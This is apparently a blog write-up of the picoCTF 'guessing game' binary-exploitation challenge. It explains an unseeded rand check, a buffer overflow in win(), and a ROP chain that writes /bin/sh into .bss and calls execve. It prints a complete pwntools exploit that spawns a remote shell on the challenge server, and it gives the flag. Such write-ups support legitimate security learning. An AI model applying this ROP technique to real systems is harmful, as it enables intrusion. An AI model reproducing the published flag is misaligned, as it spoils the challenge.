file

A 64-bit ELF file is given.

file vuln
vuln: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, for GNU/Linux 3.2.0, BuildID[sha1]=94924855c14a01a7b5b38d9ed368fba31dfd4f60, not stripped

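Here’s the checksec result. NX is turned on, so we can’t run shellcode from the stack.

checksec also reports a canary, most likely because the statically linked libc contains stack protector code. The challenge’s own functions were built with -fno-stack-protector (see the makefile below), and the disassembly of win later on shows no canary check.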

checksec

checksec vuln
[*] '/picoctf/guessing_game/vuln'
    Arch:       amd64-64-little
    RELRO:      Partial RELRO
    Stack:      Canary found
    NX:         NX enabled
    PIE:        No PIE (0x400000)
    Stripped:   No

You can also make the ELF file yourself with the makefile.

Just install make on your *nix system and run make.

I know how to use makefiles, but I’m not too familiar with them.

If you want to understand what make is, read this and this.

makefile

all:
	gcc -m64 -fno-stack-protector -O0 -no-pie -static -o vuln vuln.c

clean:
	rm vuln

I’ll explain the gcc flags used in the makefile.

GCC flags

-m64 (machine 64 bit) generates code for a 64-bit target

-fno-stack-protector (no stack canary)

-O0 (no compiler optimization)

-no-pie (not a position independent executable, so the code is loaded at a fixed address)

-static (statically linked)

The binary is a statically linked file.

What is static linking?

There are 2 types of linking (Static and Dynamic).

Statically linked binaries have all the necessary libraries copied in the ELF file.

Since it has all the library files inside the ELF file it’s easy to port the binary to other systems.

However, since all the library files are inside the ELF executable itself, the files are generally larger than dynamically linked files.

I made a dynamically linked version of vuln with the command below.

I only got rid of the -static flag and the -m64 flag.

gcc -fno-stack-protector -O0 -no-pie -o dynamic_vuln vuln.c

vuln is the statically linked file that picoCTF gave me.

dynamic_vuln is the dynamically linked file that I built myself.

du -h vuln
836K    vuln
du -h dynamic_vuln 
20K     dynamic_vuln

You can tell that the statically linked binary is about 42 times bigger (836K / 20K ≈ 41.8).

They also gave us vuln.c.

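A BOF can be exploited in the win function: fgets accepts up to 359 bytes of input (360 including the terminating null byte) into the 100-byte winner buffer.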

#define BUFSIZE 100
void win() {
	char winner[BUFSIZE];
	printf("New winner!\nName? ");
	fgets(winner, 360, stdin);
	printf("Congrats %s\n\n", winner);
}

Let’s run the binary.

./vuln
Welcome to my guessing game!

What number would you like to guess?
3
Nope!
What number would you like to guess?

I need to guess the correct number, or else the program will keep asking until I get it right.

Let’s find out what the random value is.

b get_random
r
finish
p $rax
gef➤  p $rax
$1 = 0x53

The get_random function returns 0x53 (83) every time you run the binary because the random function is never seeded, so it produces the same sequence on every run.

Even though it returns 0x53 (83), you have to pass 0x54 (84) because the increment function adds 1 to the return value of get_random.
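The value seen in gdb can be sanity-checked with a bit of arithmetic. This is only a sketch under two assumptions that are not shown in the excerpt above: that get_random() reduces rand() modulo BUFSIZE, and that the binary uses glibc, whose first rand() output without a seed is 1804289383.

```python
# Assumption: get_random() returns rand() % BUFSIZE (not shown in the excerpt).
# Assumption: glibc's rand(), when never seeded, behaves as if srand(1) had
# been called, and its first output is then 1804289383.
FIRST_UNSEEDED_GLIBC_RAND = 1804289383
BUFSIZE = 100

random_value = FIRST_UNSEEDED_GLIBC_RAND % BUFSIZE  # the value gdb showed in rax
guess = random_value + 1                            # increment() adds 1

print(hex(random_value), random_value, guess)
```

If both assumptions hold, the result lines up with the 0x53 from gdb and the 84 that the program accepts.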

Let’s run the binary again. Now that I know the random number, we’ll pass the first check.

./vuln
Welcome to my guessing game!

What number would you like to guess?
84   
Congrats! You win! Your prize is this print statement!

New winner!
Name? hwkim301
Congrats hwkim301

How do we get a shell though?

There isn’t a system function that I can use to pop a shell…

There’s a method we can use called ROP.

If there are available gadgets for ROP, we can chain the gadgets and control the instruction pointer by manipulating the stack.

Normally people call execve because it replaces the current process with the program you want to run, like '/bin/sh'.

Since execve is a syscall, setting the registers execve needs and then executing the syscall instruction will run the program you want.

Here’s what the process for setting up execve("/bin/sh",0,0) with ROP looks like.

1. A BOF overwrites the return address on the stack.

2. The program tries to return, but instead jumps to my first gadget, e.g. pop rax; ret.

3. pop rax; ret executes: rax is loaded with the execve syscall number from the stack, and ret jumps to the next address on the stack.

4. This continues for rdi, rsi and rdx, loading the /bin/sh address and nulls for the arguments and environment.

5. Finally the syscall; ret gadget is executed and the kernel executes execve("/bin/sh",NULL,NULL), popping a shell.
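The steps above can be played through with a toy simulator. This is a minimal sketch, not how the CPU is really modeled: the gadget addresses (0x1000 and so on) and the BINSH address are made-up placeholders, and only pop reg; ret gadgets plus a final syscall are supported.

```python
import struct

# Hypothetical gadget addresses, used only for this simulation.
GADGETS = {
    0x1000: "rax",  # pop rax; ret
    0x2000: "rdi",  # pop rdi; ret
    0x3000: "rsi",  # pop rsi; ret
    0x4000: "rdx",  # pop rdx; ret
}
SYSCALL = 0x5000    # syscall gadget (placeholder)
BINSH = 0x6000      # pretend address of "/bin/sh" (placeholder)


def p64(value):
    """Pack an integer as a little-endian 64-bit word."""
    return struct.pack("<Q", value)


def simulate(stack):
    """Walk the fake stack the way ret and pop would; return the registers."""
    words = [w[0] for w in struct.iter_unpack("<Q", stack)]
    regs, sp = {}, 0
    while sp < len(words):
        target = words[sp]                  # ret pops the next address into rip
        sp += 1
        if target == SYSCALL:
            return regs                     # the kernel would read the registers now
        regs[GADGETS[target]] = words[sp]   # pop reg takes the next stack word
        sp += 1
    return regs


chain = b"".join(p64(w) for w in [
    0x1000, 59,      # rax = execve syscall number
    0x2000, BINSH,   # rdi = pointer to "/bin/sh"
    0x3000, 0,       # rsi = NULL
    0x4000, 0,       # rdx = NULL
    SYSCALL,
])
registers = simulate(chain)
print(registers)
```

Each gadget consumes two stack words (its own address and the value it pops), which is why the chain alternates between an address and a value.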

I’ve solved a couple of BOF problems before, and the return address was always at buffer size + 8 bytes on 64-bit (rbp+8). For this problem it’s not.

The distance from winner (the buffer) to the return address is 120 bytes.

According to the disassembly, although the buffer is only 100 bytes, the program allocated 0x70 (112) bytes.

On x86-64 the stack must be 16-byte aligned, and the nearest multiple of 16 above 100 is 112.

The compiler rounds the frame size up to keep the stack aligned, so the extra 12 bytes here are just padding.

There’s a nice explanation here.
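The rounding can be reproduced in a couple of lines. This only mirrors the arithmetic for this particular frame; align_up is a helper name I made up, and a compiler may reserve more space than this in other functions.

```python
def align_up(size, alignment=16):
    """Round size up to the next multiple of alignment."""
    return (size + alignment - 1) // alignment * alignment


frame = align_up(100)     # BUFSIZE from vuln.c
print(frame, hex(frame))
```

The result matches the sub rsp,0x70 in the disassembly of win.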

gef➤  disass win
Dump of assembler code for function win:
  0x0000000000400c40 <+0>:     push   rbp
  0x0000000000400c41 <+1>:     mov    rbp,rsp
  0x0000000000400c44 <+4>:     sub    rsp,0x70
  0x0000000000400c48 <+8>:     lea    rdi,[rip+0x92478]        # 0x4930c7
  0x0000000000400c4f <+15>:    mov    eax,0x0
  0x0000000000400c54 <+20>:    call   0x410010 <printf>
  0x0000000000400c59 <+25>:    mov    rdx,QWORD PTR [rip+0x2b9b48]        # 0x6ba7a8 <stdin>
  0x0000000000400c60 <+32>:    lea    rax,[rbp-0x70]
  0x0000000000400c64 <+36>:    mov    esi,0x168
  0x0000000000400c69 <+41>:    mov    rdi,rax
  0x0000000000400c6c <+44>:    call   0x410a10 <fgets>
  0x0000000000400c71 <+49>:    lea    rax,[rbp-0x70]
  0x0000000000400c75 <+53>:    mov    rsi,rax
  0x0000000000400c78 <+56>:    lea    rdi,[rip+0x9245b]        # 0x4930da
  0x0000000000400c7f <+63>:    mov    eax,0x0
  0x0000000000400c84 <+68>:    call   0x410010 <printf>
  0x0000000000400c89 <+73>:    nop
  0x0000000000400c8a <+74>:    leave
  0x0000000000400c8b <+75>:    ret
End of assembler dump.

So to overwrite the return address we need 0x70+8(120) bytes.
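Here is a small sketch of that layout, built with struct instead of pwntools so it runs anywhere. The value fake_return is a placeholder for illustration, not a real gadget address.

```python
import struct

BUF_OFFSET = 0x70   # winner starts at rbp-0x70 (lea rax,[rbp-0x70])
SAVED_RBP = 8       # push rbp stored 8 bytes at [rbp]

padding_len = BUF_OFFSET + SAVED_RBP
fake_return = 0x4141414142424242   # placeholder value, not a real gadget

payload = b"A" * padding_len + struct.pack("<Q", fake_return)

# The 8 bytes right after the padding are what ret loads into rip.
(overwritten,) = struct.unpack_from("<Q", payload, padding_len)
print(padding_len, hex(overwritten))
```

Everything appended after the first 120 bytes is therefore interpreted as return addresses and popped values.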

We finished the first step, which was to overwrite the return address.

Then we need to set up the registers to call execve("/bin/sh",NULL,NULL).

How does execve("/bin/sh",NULL,NULL) call '/bin/sh'?

The OS needs to know the memory address where '/bin/sh' is stored.

Let’s find out the memory address where '/bin/sh' is.

I ran strings -a -t x vuln | grep "/bin/sh" and it returned nothing.

This means the literal string “/bin/sh\x00” is not present in the vuln binary’s code or data sections at a fixed, known address.
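The same check can be done from Python. A minimal sketch: find_all is a hypothetical helper, and sample is made-up stand-in data so the block runs without the challenge file. With the real binary you would pass open("vuln", "rb").read() instead.

```python
def find_all(data, needle):
    """Return every offset at which needle occurs in data."""
    offsets = []
    start = data.find(needle)
    while start != -1:
        offsets.append(start)
        start = data.find(needle, start + 1)
    return offsets


# Made-up stand-in bytes, not the contents of vuln.
sample = b"\x7fELF....Welcome to my guessing game!\x00/bin/ls\x00"

print(find_all(sample, b"/bin/sh"))   # empty list: the string is not there
print(find_all(sample, b"/bin/"))     # one hit, from "/bin/ls"
```

An empty list for the real file is the Python equivalent of the grep returning nothing.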

Then we need to manually make the program write '/bin/sh' and then point to it.

The .bss section (and the .data section) work like scratchpads inside the program’s memory.

They are designated areas for variables, and crucially, they are writable.

Since "/bin/sh" isn’t in .text or .rodata, you need a place to put it.

The .bss section is the perfect candidate because:

It’s writable, and its address is fixed and known in a statically linked, non-PIE binary.

There are 2 ways to put "/bin/sh" into .bss.

  1. Using read()

This is like telling your program: “Hey, take the next 8 bytes you receive from standard input (your keyboard, or my exploit script) and write them into 0x6b7000 (the bss address).”

Your ROP chain sets up the read syscall (read(0, bss_addr, 8)).

Then, after the payload is sent, you send "/bin/sh\x00" as separate input. The read syscall catches it and places it into bss.
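A sketch of what that chain could look like, written with struct so it runs without pwntools. All gadget addresses below are placeholders (the real ones come from a gadget search on vuln), and the chain assumes a syscall; ret gadget exists so execution can continue afterwards.

```python
import struct


def p64(value):
    """Pack an integer as a little-endian 64-bit word."""
    return struct.pack("<Q", value)


# Placeholder addresses, not taken from the binary.
POP_RAX, POP_RDI, POP_RSI, POP_RDX = 0x1000, 0x2000, 0x3000, 0x4000
SYSCALL_RET = 0x5000   # assumed "syscall; ret" gadget
BSS = 0x6B7000         # the bss address used in the text

SYS_READ = 0           # read is syscall number 0 on x86-64 Linux

read_chain = b"".join(p64(w) for w in [
    POP_RAX, SYS_READ,
    POP_RDI, 0,        # fd 0 = stdin
    POP_RSI, BSS,      # destination buffer
    POP_RDX, 8,        # number of bytes to read
    SYSCALL_RET,
])

# Sent as separate input after the payload; read() stores it at BSS.
second_input = b"/bin/sh\x00"
print(len(read_chain), len(second_input))
```

The execve part of the chain would follow right after SYSCALL_RET, reusing BSS as the pointer in rdi.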

  2. Using mov gadgets

This is like telling your program: “Take the value I’ve cleverly placed in a register (like rdx), and copy it directly into memory at 0x6b7000 (the bss address).”

Your ROP chain sets up rdi to point to 0x6b7000 and rdx to hold "/bin/sh\x00" (which you literally put on the stack as part of your ROP chain).

Then, a mov [rdi], rdx gadget executes, performing the copy.
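This works with a single mov because "/bin/sh" plus its null terminator is exactly 8 bytes, the size of one 64-bit register. A short check:

```python
import struct

binsh = b"/bin/sh\x00"
assert len(binsh) == 8            # fits exactly in one 64-bit register

# What rdx holds after pop rdx loads these 8 bytes (little-endian).
as_register = int.from_bytes(binsh, "little")
print(hex(as_register))

# Storing the register back to memory restores the original byte order.
restored = struct.pack("<Q", as_register)
print(restored)
```

A longer string would need several pop and mov rounds, each writing 8 bytes at the next address.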

Now that we’ve placed '/bin/sh' in memory, we can call the execve syscall.

Here’s the code for setting up the execve syscall.

It’s simpler than writing '/bin/sh' to memory.

payload += p64(pop_rax)
payload += p64(0x3B) # execve syscall number: 59 decimal = 0x3B
payload += p64(pop_rdi)
payload += p64(bss) # we need to set rdi to the address of "/bin/sh" which is in the bss
payload += p64(pop_rsi)
payload += p64(0) # rsi should be NULL(0) for execve
payload += p64(pop_rdx) 
payload += p64(0) # rdx should be NULL(0) for execve
payload += p64(syscall) # run the syscall
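The register choices follow the x86-64 Linux syscall convention: the number goes in rax and the arguments in rdi, rsi, rdx, r10, r8, r9. A small sketch of that mapping, where syscall_registers is a helper name I made up and BSS is the address used in the text:

```python
# Argument registers for x86-64 Linux syscalls, in order.
SYSCALL_ARG_REGS = ("rdi", "rsi", "rdx", "r10", "r8", "r9")
SYS_EXECVE = 59    # decimal 59, i.e. 0x3B (0x59 would be 89, a different syscall)
BSS = 0x6B7000     # where "/bin/sh" was written


def syscall_registers(number, *args):
    """Map a syscall number and its arguments to the registers that carry them."""
    regs = {"rax": number}
    regs.update(zip(SYSCALL_ARG_REGS, args))
    return regs


execve_regs = syscall_registers(SYS_EXECVE, BSS, 0, 0)
print({name: hex(value) for name, value in execve_regs.items()})
```

Each entry in the result corresponds to one pop gadget and one value in the chain.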

Here’s the full code.

Exploit Code

from pwn import *

r = remote("jupiter.challenges.picoctf.org", 39940)
e = ELF("./vuln")
Rop = ROP("./vuln")

pop_rdi = Rop.find_gadget(["pop rdi", "ret"]).address 
pop_rsi = Rop.find_gadget(["pop rsi", "ret"]).address
pop_rdx = Rop.find_gadget(["pop rdx", "ret"]).address
pop_rax = Rop.find_gadget(["pop rax", "ret"]).address
syscall = Rop.find_gadget(["syscall"]).address
mov_rdi_rdx = 0x0000000000436393 # pwntools ROP class cannot find this gadget, so I found it manually with ROPgadget ...
bss = e.bss()


payload = b"A" * (0x70 + 8) # offset from the start of the buffer to the return address
payload += p64(pop_rdi)
payload += p64(bss)
payload += p64(pop_rdx)
payload += b"/bin/sh\x00"
payload += p64(mov_rdi_rdx)

payload += p64(pop_rax)
payload += p64(0x3B) # execve syscall number: 59 decimal = 0x3B
payload += p64(pop_rdi)
payload += p64(bss) # we need to set rdi to the address of "/bin/sh" which is in the bss
payload += p64(pop_rsi)
payload += p64(0) # rsi should be NULL(0) for execve
payload += p64(pop_rdx) 
payload += p64(0) # rdx should be NULL(0) for execve
payload += p64(syscall) # run the syscall

r.sendline(b"84")
r.sendlineafter(b"Name?", payload)
r.interactive()
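One thing worth checking before sending: fgets(winner, 360, stdin) stores at most 359 bytes and stops at the first newline, so the payload has to be short enough and must not contain 0x0a. The sketch below rebuilds the payload with struct and placeholder gadget addresses (only mov_rdi_rdx and the bss value appear in the text above), so the newline check is only meaningful once the real addresses are filled in.

```python
import struct


def p64(value):
    """Pack an integer as a little-endian 64-bit word."""
    return struct.pack("<Q", value)


def fits_fgets(payload, size=360):
    """True if fgets(buf, size, stdin) would take the whole payload as one line."""
    return len(payload) <= size - 1 and b"\n" not in payload


# Placeholder gadget addresses (hypothetical); pwntools finds the real ones.
pop_rax, pop_rdi, pop_rsi, pop_rdx, syscall = 0x1000, 0x2000, 0x3000, 0x4000, 0x5000
mov_rdi_rdx = 0x436393   # from the exploit above
bss = 0x6B7000           # bss address used in the text

payload = b"A" * (0x70 + 8)
payload += p64(pop_rdi) + p64(bss) + p64(pop_rdx) + b"/bin/sh\x00" + p64(mov_rdi_rdx)
payload += p64(pop_rax) + p64(0x3B) + p64(pop_rdi) + p64(bss)
payload += p64(pop_rsi) + p64(0) + p64(pop_rdx) + p64(0) + p64(syscall)

print(len(payload), fits_fgets(payload))
```

The chain is 120 bytes of padding plus 14 eight-byte words, which leaves plenty of room under the 359-byte limit.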

Here’s the flag picoCTF{r0p_y0u_l1k3_4_hurr1c4n3_8cd37a0911d46b6b}.

The flag says rop you like a hurricane.

I learned a lot of stuff in this challenge.

It was super hard but still more doable than the filtered shellcode challenge.

I looked at almost all the writeups online lol.

Each writeup has a certain piece of information that other writeups don’t have.

Further Reading

Alternative /bin/sh Placement Techniques

  • Using mov gadget: Learn how to use the mov gadgets to write the '/bin/sh' string directly into memory.

    CSDN

  • Using read syscall: Velog writeup places '/bin/sh' into memory using the read syscall.

    Velog

Finding offsets

  • Understanding the 120-byte Offset: A detailed explanation on the calculation and significance of the 120-byte offset. It’s in Japanese btw.

    hatenablog

General Challenge Writeup

  • Neat writeup: A super neat and detailed writeup in traditional Chinese.

    writeup